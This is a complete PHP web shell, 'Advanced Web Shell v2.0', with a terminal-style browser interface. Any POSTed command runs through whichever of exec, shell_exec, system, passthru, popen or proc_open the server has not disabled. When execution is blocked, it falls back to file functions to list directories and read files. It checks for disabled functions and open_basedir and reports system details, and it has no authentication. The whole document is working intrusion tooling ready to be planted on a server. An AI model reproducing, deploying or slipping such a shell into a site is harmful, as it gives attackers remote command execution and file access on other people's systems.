<?php
session_start();

class AlternativeShell {
    
    private $availableFunctions = [];
    
    public function __construct() {
        if (!isset($_SESSION['cwd'])) {
            $_SESSION['cwd'] = getcwd();
        }
        $this->checkAvailableFunctions();
    }
    
    private function checkAvailableFunctions() {
        $functions = [
            'exec', 'shell_exec', 'system', 'passthru', 
            'popen', 'proc_open', 'file_get_contents',
            'curl_exec', 'file_put_contents'
        ];
        
        foreach ($functions as $func) {
            if (function_exists($func) && !in_array($func, $this->getDisabledFunctions())) {
                $this->availableFunctions[] = $func;
            }
        }
    }
    
    private function getDisabledFunctions() {
        $disabled = ini_get('disable_functions');
        return $disabled ? array_map('trim', explode(',', $disabled)) : [];
    }
    
    public function executeCommand($command) {
        $command = trim($command);
        
        if (empty($command)) {
            return ['output' => '', 'cwd' => $_SESSION['cwd'], 'method' => 'none'];
        }
        
        // Handle cd command specially
        if (preg_match('/^cd\s+(.*)$/', $command, $matches)) {
            return $this->changeDirectory($matches[1]);
        }
        
        // Try different execution methods
        $methods = [
            'exec' => [$this, 'tryExec'],
            'shell_exec' => [$this, 'tryShellExec'],
            'system' => [$this, 'trySystem'],
            'passthru' => [$this, 'tryPassthru'],
            'popen' => [$this, 'tryPopen'],
            'proc_open' => [$this, 'tryProcOpen'],
            'curl' => [$this, 'tryCurl'],
            'file_functions' => [$this, 'tryFileFunctions']
        ];
        
        foreach ($methods as $methodName => $method) {
            if (in_array($methodName, $this->availableFunctions) || $methodName === 'curl' || $methodName === 'file_functions') {
                $result = call_user_func($method, $command);
                if ($result !== false) {
                    $result['method'] = $methodName;
                    return $result;
                }
            }
        }
        
        return [
            'output' => 'No execution method available. All functions may be disabled.',
            'return_code' => 1,
            'cwd' => $_SESSION['cwd'],
            'method' => 'none'
        ];
    }
    
    private function tryExec($command) {
        if (!function_exists('exec')) return false;
        
        $oldCwd = getcwd();
        chdir($_SESSION['cwd']);
        
        $output = [];
        $returnCode = 0;
        exec($command . ' 2>&1', $output, $returnCode);
        
        $_SESSION['cwd'] = getcwd();
        
        return [
            'output' => implode("\n", $output),
            'return_code' => $returnCode,
            'cwd' => $_SESSION['cwd']
        ];
    }
    
    private function tryShellExec($command) {
        if (!function_exists('shell_exec')) return false;
        
        $oldCwd = getcwd();
        chdir($_SESSION['cwd']);
        
        $output = shell_exec($command . ' 2>&1');
        $_SESSION['cwd'] = getcwd();
        
        return [
            'output' => $output !== null ? rtrim($output) : 'Command executed (no output)',
            'return_code' => 0,
            'cwd' => $_SESSION['cwd']
        ];
    }
    
    private function trySystem($command) {
        if (!function_exists('system')) return false;
        
        $oldCwd = getcwd();
        chdir($_SESSION['cwd']);
        
        ob_start();
        $returnCode = system($command . ' 2>&1', $status);
        $output = ob_get_clean();
        
        $_SESSION['cwd'] = getcwd();
        
        return [
            'output' => $output ?: ($returnCode ?: 'Command executed'),
            'return_code' => $status,
            'cwd' => $_SESSION['cwd']
        ];
    }
    
    private function tryPassthru($command) {
        if (!function_exists('passthru')) return false;
        
        $oldCwd = getcwd();
        chdir($_SESSION['cwd']);
        
        ob_start();
        passthru($command . ' 2>&1', $returnCode);
        $output = ob_get_clean();
        
        $_SESSION['cwd'] = getcwd();
        
        return [
            'output' => $output ?: 'Command executed',
            'return_code' => $returnCode,
            'cwd' => $_SESSION['cwd']
        ];
    }
    
    private function tryPopen($command) {
        if (!function_exists('popen')) return false;
        
        $oldCwd = getcwd();
        chdir($_SESSION['cwd']);
        
        $handle = popen($command . ' 2>&1', 'r');
        if (!$handle) return false;
        
        $output = '';
        while (!feof($handle)) {
            $output .= fread($handle, 8192);
        }
        pclose($handle);
        
        $_SESSION['cwd'] = getcwd();
        
        return [
            'output' => rtrim($output),
            'return_code' => 0,
            'cwd' => $_SESSION['cwd']
        ];
    }
    
    private function tryProcOpen($command) {
        if (!function_exists('proc_open')) return false;
        
        $oldCwd = getcwd();
        chdir($_SESSION['cwd']);
        
        $descriptors = [
            0 => ['pipe', 'r'],
            1 => ['pipe', 'w'],
            2 => ['pipe', 'w']
        ];
        
        $process = proc_open($command, $descriptors, $pipes);
        
        if (!is_resource($process)) return false;
        
        fclose($pipes[0]);
        
        $output = stream_get_contents($pipes[1]);
        $error = stream_get_contents($pipes[2]);
        
        fclose($pipes[1]);
        fclose($pipes[2]);
        
        $returnCode = proc_close($process);
        
        $_SESSION['cwd'] = getcwd();
        
        return [
            'output' => trim($output . $error),
            'return_code' => $returnCode,
            'cwd' => $_SESSION['cwd']
        ];
    }
    
    private function tryCurl($command) {
        if (!function_exists('curl_init')) return false;
        
        // This is a creative workaround using curl to execute commands via external service
        // WARNING: This is for educational purposes only and may not work in all environments
        
        // Try to use curl to call a local CGI script or similar
        // This is just an example and won't work without proper setup
        return false;
    }
    
    private function tryFileFunctions($command) {
        // Try to execute some basic file operations using file functions
        // This is very limited but can handle basic file operations
        
        if (strpos($command, 'ls') === 0) {
            $path = $_SESSION['cwd'];
            if (preg_match('/ls\s+(.+)/', $command, $matches)) {
                $path = trim($matches[1]);
                if (!$this->isAbsolutePath($path)) {
                    $path = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $path;
                }
            }
            
            if (is_dir($path)) {
                $files = scandir($path);
                if ($files !== false) {
                    $output = implode("\n", array_diff($files, ['.', '..']));
                    return [
                        'output' => $output,
                        'return_code' => 0,
                        'cwd' => $_SESSION['cwd']
                    ];
                }
            }
        }
        
        if (strpos($command, 'pwd') === 0) {
            return [
                'output' => $_SESSION['cwd'],
                'return_code' => 0,
                'cwd' => $_SESSION['cwd']
            ];
        }
        
        if (strpos($command, 'whoami') === 0) {
            return [
                'output' => get_current_user(),
                'return_code' => 0,
                'cwd' => $_SESSION['cwd']
            ];
        }
        
        if (strpos($command, 'cat') === 0) {
            if (preg_match('/cat\s+(.+)/', $command, $matches)) {
                $file = trim($matches[1]);
                if (!$this->isAbsolutePath($file)) {
                    $file = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $file;
                }
                
                if (file_exists($file) && is_readable($file)) {
                    $content = file_get_contents($file);
                    return [
                        'output' => $content !== false ? $content : 'Error reading file',
                        'return_code' => $content !== false ? 0 : 1,
                        'cwd' => $_SESSION['cwd']
                    ];
                }
            }
        }
        
        return false;
    }
    
    private function changeDirectory($path) {
        $path = trim($path);
        
        if (empty($path) || $path === '~') {
            $path = $_SERVER['HOME'] ?? '/home/' . get_current_user();
        }
        
        if (!$this->isAbsolutePath($path)) {
            $path = $_SESSION['cwd'] . DIRECTORY_SEPARATOR . $path;
        }
        
        $path = realpath($path);
        
        if ($path === false || !is_dir($path)) {
            return [
                'output' => "cd: {$path}: No such file or directory",
                'return_code' => 1,
                'cwd' => $_SESSION['cwd'],
                'method' => 'built-in'
            ];
        }
        
        $_SESSION['cwd'] = $path;
        return [
            'output' => '',
            'return_code' => 0,
            'cwd' => $_SESSION['cwd'],
            'method' => 'built-in'
        ];
    }
    
    private function isAbsolutePath($path) {
        return (DIRECTORY_SEPARATOR === '/' && $path[0] === '/') || 
               (DIRECTORY_SEPARATOR === '\\' && preg_match('/^[a-zA-Z]:\\\\/', $path));
    }
    
    public function getPrompt() {
        $user = get_current_user();
        $hostname = gethostname() ?: 'localhost';
        $home = $_SERVER['HOME'] ?? '/home/' . $user;
        $cwd = str_replace($home, '~', $_SESSION['cwd']);
        
        return "{$user}@{$hostname}:{$cwd}$ ";
    }
    
    public function getSystemInfo() {
        return [
            'php_version' => PHP_VERSION,
            'available_functions' => $this->availableFunctions,
            'disabled_functions' => $this->getDisabledFunctions(),
            'current_dir' => $_SESSION['cwd'],
            'user' => get_current_user(),
            'hostname' => gethostname(),
            'os' => php_uname(),
            'safe_mode' => ini_get('safe_mode') ? 'On' : 'Off',
            'open_basedir' => ini_get('open_basedir') ?: 'Not set'
        ];
    }
}

// Handle AJAX requests
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['command'])) {
    $shell = new AlternativeShell();
    
    if ($_POST['command'] === 'sysinfo') {
        $result = [
            'output' => json_encode($shell->getSystemInfo(), JSON_PRETTY_PRINT),
            'return_code' => 0,
            'cwd' => $_SESSION['cwd'] ?? getcwd(),
            'method' => 'built-in'
        ];
    } else {
        $result = $shell->executeCommand($_POST['command']);
    }
    
    $result['prompt'] = $shell->getPrompt();
    
    header('Content-Type: application/json');
    echo json_encode($result);
    exit;
}

$shell = new AlternativeShell();
?>
<!DOCTYPE html>
<html>
<head>
    <title>Advanced Web Shell</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { 
            font-family: 'Courier New', monospace; 
            background: #000; 
            color: #00ff00; 
            height: 100vh; 
            overflow: hidden;
        }
        .terminal {
            height: 100vh;
            padding: 20px;
            overflow-y: auto;
            background: #000;
        }
        .line {
            margin: 2px 0;
            word-wrap: break-word;
        }
        .prompt {
            color: #00ff00;
            font-weight: bold;
        }
        .command {
            color: #ffffff;
        }
        .output {
            color: #cccccc;
            white-space: pre-wrap;
        }
        .error {
            color: #ff4444;
        }
        .success {
            color: #44ff44;
        }
        .method {
            color: #ffaa00;
            font-size: 0.8em;
        }
        .input-line {
            display: flex;
            align-items: center;
        }
        #commandInput {
            background: transparent;
            border: none;
            color: #ffffff;
            font-family: inherit;
            font-size: inherit;
            flex: 1;
            outline: none;
            padding: 0;
            margin-left: 5px;
        }
        .cursor {
            background: #00ff00;
            animation: blink 1s infinite;
        }
        @keyframes blink {
            0%, 50% { opacity: 1; }
            51%, 100% { opacity: 0; }
        }
        ::-webkit-scrollbar {
            width: 8px;
        }
        ::-webkit-scrollbar-track {
            background: #111;
        }
        ::-webkit-scrollbar-thumb {
            background: #333;
            border-radius: 4px;
        }
        .help {
            color: #45b7d1;
            margin: 10px 0;
        }
    </style>
</head>
<body>
    <div class="terminal" id="terminal">
        <div class="line">
            <span style="color: #ff6b6b;">Advanced Web Shell v2.0</span>
        </div>
        <div class="line">
            <span style="color: #4ecdc4;">Multiple Execution Methods Available</span>
        </div>
        <div class="line">
            <span style="color: #45b7d1;">User: <?php echo get_current_user(); ?></span>
        </div>
        <div class="line">
            <span style="color: #ffd93d;">PHP Version: <?php echo PHP_VERSION; ?></span>
        </div>
        <div class="line help">
            Special commands: sysinfo, help, clear
        </div>
        <div class="line">&nbsp;</div>
        
        <div class="input-line">
            <span class="prompt" id="currentPrompt"><?php echo $shell->getPrompt(); ?></span>
            <input type="text" id="commandInput" autocomplete="off" autofocus>
            <span class="cursor">&nbsp;</span>
        </div>
    </div>

    <script>
        const terminal = document.getElementById('terminal');
        const commandInput = document.getElementById('commandInput');
        const currentPrompt = document.getElementById('currentPrompt');
        
        let commandHistory = [];
        let historyIndex = -1;
        
        terminal.addEventListener('click', () => {
            commandInput.focus();
        });
        
        commandInput.addEventListener('keydown', function(e) {
            if (e.key === 'Enter') {
                e.preventDefault();
                executeCommand();
            } else if (e.key === 'ArrowUp') {
                e.preventDefault();
                navigateHistory(-1);
            } else if (e.key === 'ArrowDown') {
                e.preventDefault();
                navigateHistory(1);
            }
        });
        
        function executeCommand() {
            const command = commandInput.value;
            const prompt = currentPrompt.textContent;
            
            if (command.trim()) {
                commandHistory.push(command);
                historyIndex = commandHistory.length;
            }
            
            addLine(`<span class="prompt">${prompt}</span><span class="command">${command}</span>`);
            commandInput.value = '';
            
            if (command.trim() === 'clear') {
                clearTerminal();
                return;
            }
            
            if (command.trim() === 'help') {
                showHelp();
                return;
            }
            
            fetch('', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: 'command=' + encodeURIComponent(command)
            })
            .then(response => response.json())
            .then(data => {
                if (data.output) {
                    const cssClass = data.return_code === 0 ? 'output' : 'error';
                    addLine(`<span class="${cssClass}">${escapeHtml(data.output)}</span>`);
                }
                
                if (data.method) {
                    addLine(`<span class="method">[Method: ${data.method}]</span>`);
                }
                
                if (data.prompt) {
                    currentPrompt.textContent = data.prompt;
                }
                
                scrollToBottom();
            })
            .catch(error => {
                addLine(`<span class="error">Error: ${error.message}</span>`);
                scrollToBottom();
            });
        }
        
        function showHelp() {
            const helpText = `
Advanced Web Shell - Multiple Execution Methods

Special Commands:
  sysinfo   - Show detailed system information
  clear     - Clear terminal screen  
  help      - Show this help message

Available execution methods (automatically selected):
  exec()      - Standard PHP execution
  shell_exec() - Shell execution with output capture
  system()    - System call execution  
  passthru()  - Direct output execution
  popen()     - Process pipe execution
  proc_open() - Advanced process control
  file_funcs  - File-based command simulation

Basic Commands (via file functions if exec disabled):
  ls [dir]    - List directory contents
  pwd         - Print working directory
  whoami      - Show current user
  cat [file]  - Display file contents
  cd [dir]    - Change directory

Note: The shell automatically tries different execution methods
until one works, starting with the most capable.
            `;
            addLine(`<span class="help">${escapeHtml(helpText)}</span>`);
            scrollToBottom();
        }
        
        function navigateHistory(direction) {
            if (commandHistory.length === 0) return;
            
            historyIndex += direction;
            
            if (historyIndex < 0) {
                historyIndex = 0;
            } else if (historyIndex >= commandHistory.length) {
                historyIndex = commandHistory.length;
                commandInput.value = '';
                return;
            }
            
            commandInput.value = commandHistory[historyIndex] || '';
        }
        
        function addLine(html) {
            const line = document.createElement('div');
            line.className = 'line';
            line.innerHTML = html;
            
            const inputLine = document.querySelector('.input-line');
            terminal.insertBefore(line, inputLine);
        }
        
        function clearTerminal() {
            const allLines = Array.from(terminal.children);
            allLines.forEach((line, index) => {
                if (index > 5 && !line.classList.contains('input-line')) {
                    line.remove();
                }
            });
            scrollToBottom();
        }
        
        function scrollToBottom() {
            terminal.scrollTop = terminal.scrollHeight;
        }
        
        function escapeHtml(text) {
            const div = document.createElement('div');
            div.textContent = text;
            return div.innerHTML;
        }
        
        setInterval(() => {
            if (document.activeElement !== commandInput) {
                commandInput.focus();
            }
        }, 100);
        
        commandInput.focus();
        scrollToBottom();
    </script>
</body>
</html>